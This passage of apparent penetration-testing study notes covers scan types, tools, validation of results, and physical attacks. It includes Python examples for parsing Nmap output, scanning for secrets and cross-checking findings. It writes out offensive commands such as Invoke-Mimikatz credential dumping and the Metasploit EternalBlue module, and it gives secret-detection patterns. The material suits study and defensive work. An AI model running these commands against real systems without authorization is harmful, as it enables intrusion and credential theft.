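        # "open|filtered" (typical for UDP) is unconfirmed, so it is deliberately excluded
        if r["state"] == "open":
            grouped[r["host"]].append(f'{r["port"]}/{r["proto"]}')
    return {h: sorted(p, key=lambda s: int(s.split("/")[0])) for h, p in grouped.items()}


def hosts_running(records, service_name):
    """Transform: which hosts expose a given service (input for a follow-up NSE run)."""
    return sorted({r["host"] for r in records
                   if r["service"] == service_name and r["state"] == "open"})


if __name__ == "__main__":
    recs = parse_nmap_xml(SAMPLE_XML)
    for host, ports in open_ports_by_host(recs).items():
        print(host, ", ".join(ports))
    print("SMB hosts:", hosts_running(recs, "microsoft-ds"))
```

To use it on a real scan, replace SAMPLE_XML with the contents of the file written by nmap -oX; the same three functions then feed host lists into later steps (for instance, handing the result of hosts_running(recs, "http") to nmap --script http-enum).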

August 7, 2024 · 15 min · Dhanraj Chavan

Chapter 3: Vulnerability Discovery and Analysis

Chapter 3

Objective 3.1

Container Scans
• Purpose: Assess the security of containerized applications and environments.
• Techniques:
  • Sidecar scans: Use a sidecar container to monitor and analyze the security of a main container. Example: A sidecar container running a security tool to check for vulnerabilities in the main application container.

Application Scans
• Purpose: Identify vulnerabilities in applications at different stages of development and deployment.
• Techniques:
  • Dynamic Application Security Testing (DAST): Test running applications for vulnerabilities by simulating attacks. Example: Using tools like OWASP ZAP to perform DAST on a web application.
  • Interactive Application Security Testing (IAST): Combine elements of DAST and SAST by instrumenting the application and monitoring it from within at runtime. Example: Using tools like Contrast Security to identify vulnerabilities as the application runs.
  • Software Composition Analysis (SCA): Analyze third-party and open-source components for known vulnerabilities. Example: Using tools like Snyk or Black Duck to scan dependencies for vulnerabilities.
  • Static Application Security Testing (SAST): Analyze source code for vulnerabilities without executing it. Example: Using tools like SonarQube or Checkmarx for static code analysis. Subtypes:
    • Infrastructure as Code (IaC): Analyze infrastructure configuration files (e.g., Terraform, CloudFormation) for security issues.
    • Source code analysis: Directly examine the application’s source code to find vulnerabilities.
  • Mobile scan: Assess mobile applications for security vulnerabilities. Example: Using tools like MobSF to scan Android or iOS applications.

Network Scans
• Purpose: Identify vulnerabilities in network devices, services, and configurations.
• Techniques:
  • TCP/UDP scan: Scan for open TCP and UDP ports to identify services running on the network. Example: Using Nmap to perform TCP and UDP scans on a target network.
    Command: nmap -sS -sU target_ip (both scan types need raw sockets, so run as root; UDP scanning is slow and frequently reports open|filtered, which needs follow-up before it counts as a finding).
  • Stealth scans: Use techniques that reduce the footprint a scan leaves on the target. Example: Using Nmap’s SYN scan (half-open scan), which never completes the TCP handshake, so the probe does not reach the listening application and its logs. Command: nmap -sS target_ip. The "stealth" is only relative to application logs; SYN scans are still plainly visible to firewalls and IDS/IPS.

Host-Based Scans
• Purpose: Identify vulnerabilities on individual hosts (e.g., servers, workstations).
• Techniques:
  • Agent-based: Install an agent on the host to gather detailed information. Example: Using Nessus agents to perform deep scans on hosts.
  • Agentless: Use network protocols (e.g., SMB, SSH) to gather information without installing software. Example: Using OpenVAS to perform remote scans on hosts.

Authenticated vs. Unauthenticated Scans
• Authenticated scans:
  • Purpose: Perform scans with credentials to get deeper insight into vulnerabilities.
  • Benefits: Access to detailed information such as configuration files, installed software, and patch levels, which cuts down false positives from banner-only version checks.
  • Example: Running a credentialed Nessus scan to check for missing patches.
• Unauthenticated scans:
  • Purpose: Perform scans without credentials, simulating an external attacker.
  • Benefits: Identify vulnerabilities exposed to unauthenticated users.
  • Example: Using Nmap for a network scan without credentials.

Secrets Scanning
• Purpose: Identify sensitive information such as API keys, passwords, and tokens in source code and configuration files.
• Techniques:
  • Automated tools: Use tools specifically designed to find secrets. Example: Using GitGuardian to scan repositories for exposed secrets.

Wireless Scans
• Purpose: Assess the security of wireless networks.
• Techniques:
  • SSID scanning: Identify and list the SSIDs of nearby wireless networks. Example: Using tools like Kismet to scan for SSIDs.
  • Channel scanning: Identify which channels wireless networks are operating on. Example: Using tools like WiFi Analyzer to scan channels.
  • Signal strength scanning: Measure the signal strength of wireless networks to determine proximity and potential interference.
    Example: Using tools like NetSpot to map signal strength.

Industrial Control Systems (ICS) Vulnerability Assessment
• Purpose: Identify vulnerabilities in ICS environments, which are critical for industrial operations and often fragile under active scanning.
• Techniques:
  • Manual assessment: Perform a hands-on review of ICS components and configurations. Example: Conducting a physical and logical assessment of PLCs, SCADA systems, and network configurations.
  • Port mirroring: Use port mirroring on network switches to capture and analyze ICS traffic without interrupting operations. Example: Setting up port mirroring on a switch to capture ICS traffic for analysis with Wireshark.

Tools

Nikto
• Purpose: Web server scanner. Nikto is an open-source web server scanner that performs comprehensive tests against web servers for multiple items, including over 6,700 potentially dangerous files or programs, checks for outdated versions of over 1,250 servers, and version-specific problems on over 270 servers. It is widely used by penetration testers, security researchers, and IT professionals to identify vulnerabilities and misconfigurations in web servers.
• Usage: Identify potential issues in web servers, such as outdated software, misconfigurations, and vulnerabilities.
• Example: Scanning a web server for common vulnerabilities.
• Command: nikto -h http://targetwebsite.com

Greenbone/OpenVAS
• Purpose: Vulnerability scanning and management. Greenbone Vulnerability Manager (GVM), often referred to as OpenVAS (Open Vulnerability Assessment System), is an open-source framework for vulnerability scanning and management. OpenVAS is the scanner component of the GVM suite. It helps organizations identify security issues, misconfigurations, and vulnerabilities in their networks and systems.
• Usage: Perform comprehensive vulnerability assessments across networks and systems.
• Example: Using OpenVAS to scan a network for vulnerabilities.
• Command: gvm-start on current Kali releases (older installs used openvas-start) to start the services, then configure and run scans through the web interface.

TruffleHog
• Purpose: Secrets detection tool.
• Usage: Scan repositories for high-entropy strings and known credential formats such as API keys and passwords.
• Example: Scanning a Git repository for secrets, including its history.
• Command: trufflehog git https://github.com/target/repo

BloodHound
• Purpose: Active Directory (AD) attack-path mapping tool.
• Usage: Identify and analyze AD relationships and permissions that an attacker could chain together.
• Example: Using BloodHound to map AD relationships and identify attack paths to high-value targets such as Domain Admins.
• Command: Invoke-BloodHound -CollectionMethod All in PowerShell (the SharpHound collector) to gather data, then import and analyze it in the BloodHound interface.

Tenable Nessus
• Purpose: Comprehensive vulnerability scanner. Tenable Nessus is a widely used commercial vulnerability scanner designed to assess networks, systems, and applications for security vulnerabilities. Developed by Tenable, Nessus offers robust scanning capabilities, ease of use, and comprehensive reporting. It is popular among security professionals for identifying, prioritizing, and remediating vulnerabilities in IT environments.
• Usage: Identify vulnerabilities, misconfigurations, and compliance issues across various systems.
• Example: Running a vulnerability scan on a network.
• Command: Configure and start scans through the Nessus web interface.

PowerSploit
• Purpose: Post-exploitation framework for PowerShell. PowerSploit is a collection of PowerShell scripts designed for offensive security and post-exploitation. It is widely used by penetration testers and red teamers for reconnaissance, exploitation, persistence, and data exfiltration, and leverages PowerShell’s access to the Windows operating system to perform complex tasks.
• Usage: Perform post-exploitation tasks such as privilege escalation, credential dumping, and persistence.
• Example: Using PowerSploit to execute a PowerShell script for dumping credentials.
• Command: Import-Module PowerSploit; Invoke-Mimikatz

Grype
• Purpose: Vulnerability scanner for container images and filesystems. Grype is an open-source vulnerability scanner developed by Anchore. It identifies known vulnerabilities in container images and filesystems, which makes it a useful tool for DevOps and security teams securing containerized applications.
• Usage: Identify known vulnerabilities in container images.
• Example: Scanning a Docker image for vulnerabilities.
• Command: grype docker:targetimage

Trivy
• Purpose: Vulnerability scanner for containers, Kubernetes, and other artifacts. Trivy is a comprehensive and easy-to-use open-source scanner for container images, filesystems, and repositories. Developed by Aqua Security, it is known for its speed, accuracy, and simplicity. It scans OS packages and application dependencies, making it a versatile tool for DevSecOps workflows.
• Usage: Detect vulnerabilities, misconfigurations, and secrets.
• Example: Scanning a container image for vulnerabilities.
• Command: trivy image targetimage

Kube-hunter
• Purpose: Kubernetes security tool. Kube-hunter is an open-source tool designed to perform security assessments of Kubernetes clusters. Developed by Aqua Security, it identifies security vulnerabilities and misconfigurations in Kubernetes environments and is useful for penetration testers, security professionals, and Kubernetes administrators.
• Usage: Identify, and with active hunting optionally exploit, vulnerabilities in Kubernetes clusters.
• Example: Running a scan to find vulnerabilities in a Kubernetes cluster.
• Command: kube-hunter --remote targetclusterip

Objective 3.2

Validating Scan, Reconnaissance, and Enumeration Results

False Positives
• Definition: Incorrectly identifying a non-vulnerability as a vulnerability.
• Example: A scanner flags an outdated software version from the banner, but the package is actually patched (for instance via a distribution backport) and secure.
• Validation: Manually verify the flagged issue to confirm whether it is a real vulnerability.

False Negatives
• Definition: Failing to identify an actual vulnerability.
• Example: A scanner misses a known SQL injection vulnerability due to misconfiguration.
• Validation: Cross-check results with other tools or manual testing to ensure comprehensive coverage.

True Positives
• Definition: Correctly identifying a real vulnerability.
• Example: A scanner detects an open port that is genuinely exposed and vulnerable.
• Validation: Verify the vulnerability through manual testing or exploitation.

Scan Completeness
• Definition: Ensuring the scan has covered all intended targets and aspects.
• Example: Verifying all network segments, hosts, and services were scanned.
• Validation: Review scan logs and reports to ensure no areas were missed.

Troubleshooting Scan Configurations
• Definition: Adjusting scan settings to ensure accurate and complete results.
• Example: Modifying timeout settings or authentication credentials to ensure thorough scanning.
• Validation: Perform test scans after configuration changes to verify improved accuracy and completeness.

Public Exploit Selection
• Purpose: Choosing appropriate publicly available exploits to validate vulnerabilities.
• Sources: Exploit databases such as Exploit-DB, Metasploit, and GitHub repositories.
• Example: Selecting a Metasploit module to exploit a detected vulnerability.
• Command: msfconsole, then search for and use the relevant module, e.g., use exploit/windows/smb/ms17_010_eternalblue

Using Scripting to Validate Results
• Purpose: Automating the validation of scan, reconnaissance, and enumeration results.
• Scripting languages: Python, Bash, PowerShell.
• Examples: Scripts for cross-checking open ports, vulnerable software versions, and open SMB shares.

Objective 3.3

Tailgating
• Definition: Unauthorized entry by following an authorized person through a controlled door.
• Prevention: Turnstiles, employee training, security guards.

Site Surveys
• Definition: Assessments of physical security measures.
• Purpose: Identifying vulnerabilities, recommending improvements, ensuring compliance.

USB Drops
• Definition: Malicious USB devices left in conspicuous places.
• Purpose: Deliver malware, gain access to data/systems.
• Prevention: Employee education, strict USB policies, disabling USB ports.

Badge Cloning
• Definition: Duplicating access badges.
• Purpose: Bypassing access controls.
• Prevention: Secure badge technologies, multi-factor authentication, regular audits.

Lock Picking
• Definition: Manually opening locks without a key.
• Purpose: Unauthorized access.
• Prevention: High-security locks, additional security layers, monitoring.
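The Secrets Scanning and TruffleHog notes in Objective 3.1 describe two detection approaches: matching known credential formats, and flagging high-entropy strings. The script below is an added example written for these notes, not TruffleHog’s code or anything from the original post. It combines both approaches over an in-memory set of files. The file contents are constructed; the AWS key is Amazon’s documented placeholder, the PEM body is a truncated made-up fragment, and the 4.0 bits-per-character threshold and the two regexes are assumptions chosen for the example.

```python
"""Minimal secrets scanner: known-format patterns plus Shannon-entropy detection.

Added example for the Secrets Scanning / TruffleHog notes; it is not TruffleHog's
code. SAMPLE_FILES is constructed (the AWS key ID is Amazon's documented example
value and the PEM body is a truncated made-up fragment, not a real key).
"""
import math
import re
from collections import Counter

# Constructed sample: a config file, a stray key file, and a harmless script.
SAMPLE_FILES = {
    "config/settings.py": (
        'DEBUG = False\n'
        'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'
        'AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"\n'
        'LOG_LEVEL = "INFO"\n'
    ),
    "deploy/key.pem": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIEowIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy0AuIb0rWwxR\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
    "src/app.py": (
        'GREETING = "hello world, this is a plain string"\n'
        'PROJECT_NAME = "my-project-name"\n'
    ),
}

# Known-format patterns: structured credentials are caught regardless of entropy.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}
# Quoted literals of at least 20 token characters; shorter strings give noisy entropy.
QUOTED = re.compile(r"[\"']([A-Za-z0-9+/=_\-]{20,})[\"']")
ENTROPY_THRESHOLD = 4.0  # bits/char (assumed); prose and identifiers sit well below this


def shannon_entropy(s):
    """Shannon entropy of s in bits per character (0 for empty or single-symbol strings)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(path, text):
    """Return findings as (path, line_no, kind, matched_string) tuples for one file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pat in PATTERNS.items():
            for m in pat.finditer(line):
                findings.append((path, line_no, kind, m.group(0)))
        for m in QUOTED.finditer(line):
            literal = m.group(1)
            if any(f[3] == literal for f in findings):
                continue  # already reported by a structured pattern; avoid a duplicate
            if shannon_entropy(literal) >= ENTROPY_THRESHOLD:
                findings.append((path, line_no, "high_entropy", literal))
    return findings


def scan_files(files):
    """Scan a {path: content} mapping, e.g. the working tree of a checked-out repo."""
    results = []
    for path, text in files.items():
        results.extend(scan_text(path, text))
    return results


if __name__ == "__main__":
    for path, line_no, kind, value in scan_files(SAMPLE_FILES):
        print(f"{path}:{line_no}: {kind}: {value[:12]}...")
```

The pattern list is deliberately tiny; a real run uses a maintained signature set and, as the TruffleHog command on this page does, also walks Git history, since a secret removed in a later commit is still recoverable from earlier ones. Entropy alone produces false positives on hashes, UUIDs and base64 blobs, so the structured patterns come first and the entropy check is a fallback for formats the patterns do not know.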
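Objective 3.2 lists scripts that cross-check open ports and vulnerable versions as a way to sort scanner output into true positives, false positives and false negatives. The following is an added example written for these notes, not code from the original post: it takes a vulnerability scanner’s findings, an independent Nmap -sV port/banner list, and a set of versions the owner has confirmed as backport-patched, and classifies each finding. Every host, port, version and "fixed in" value is constructed for the example; none refers to a real advisory.

```python
"""Cross-check vulnerability-scanner findings against an independent Nmap run.

Added example for Objective 3.2 (validating results with scripting); it is not
code from the original post. SCANNER, NMAP and BACKPORT_PATCHED are constructed
placeholders, not real advisories or real hosts.
"""
from collections import namedtuple

Finding = namedtuple("Finding", "host port service version fixed_in")

# Constructed: what an unauthenticated vulnerability scan reported.
SCANNER = [
    Finding("10.0.0.5", 22, "ssh", "7.4", "7.5"),        # flagged on banner version only
    Finding("10.0.0.5", 80, "http", "1.18.0", "1.20.0"),
    Finding("10.0.0.6", 445, "smb", "", ""),             # open-port finding, no version check
    Finding("10.0.0.8", 21, "ftp", "2.0", "2.1"),        # host never seen by the Nmap run
]

# Constructed: (host, port) -> banner version from an independent `nmap -sV` run.
NMAP = {
    ("10.0.0.5", 22): "7.4p1 Debian-10+deb9u7",   # distro backport: old number, patched
    ("10.0.0.5", 80): "1.18.0",
    ("10.0.0.6", 445): "",
    ("10.0.0.6", 3389): "",                       # open, but absent from SCANNER
}

# Constructed: (service, banner) pairs confirmed patched by a credentialed check.
BACKPORT_PATCHED = {("ssh", "7.4p1 Debian-10+deb9u7")}


def version_tuple(v):
    """'1.18.0' -> (1, 18, 0); parsing stops at the first non-numeric text ('7.4p1' -> (7, 4))."""
    parts = []
    for piece in v.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def classify(scanner, nmap, backport_patched):
    """Bucket findings: true/false positive, needs manual review, and false negatives."""
    result = {"true_positive": [], "false_positive": [],
              "needs_review": [], "false_negative": []}
    seen = set()
    for f in scanner:
        key = (f.host, f.port)
        seen.add(key)
        if key not in nmap:
            # Disagreement between tools is a scan-scope/config question, not a verdict yet.
            result["needs_review"].append((f, "not open in Nmap run; check reachability and scope"))
            continue
        banner = nmap[key]
        if not f.fixed_in:
            result["true_positive"].append((f, "open port confirmed by second tool"))
        elif (f.service, banner) in backport_patched:
            result["false_positive"].append((f, "version is backport-patched"))
        elif version_tuple(banner) and version_tuple(banner) < version_tuple(f.fixed_in):
            result["true_positive"].append((f, f"banner {banner!r} is below fixed {f.fixed_in}"))
        else:
            result["needs_review"].append((f, f"banner {banner!r} does not confirm the version"))
    for key in nmap:
        if key not in seen:
            # Open from Nmap's vantage point but missing from the scanner: coverage gap.
            result["false_negative"].append((key, "open port missing from scanner output"))
    return result


if __name__ == "__main__":
    for bucket, items in classify(SCANNER, NMAP, BACKPORT_PATCHED).items():
        for item, reason in items:
            print(f"{bucket}: {item} ({reason})")
```

Two choices are worth noting. A finding on a port the second tool never saw lands in needs_review rather than false_positive, because the disagreement may equally be an Nmap coverage problem (timeouts, a host down during that scan, a missed subnet), which is the scan-completeness check the notes describe. And the backport case is only resolved by a credentialed source (a package-manager query or changelog), which is why the notes recommend authenticated scans where a banner-only version check would otherwise produce false positives.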

August 7, 2024 · 8 min · Dhanraj Chavan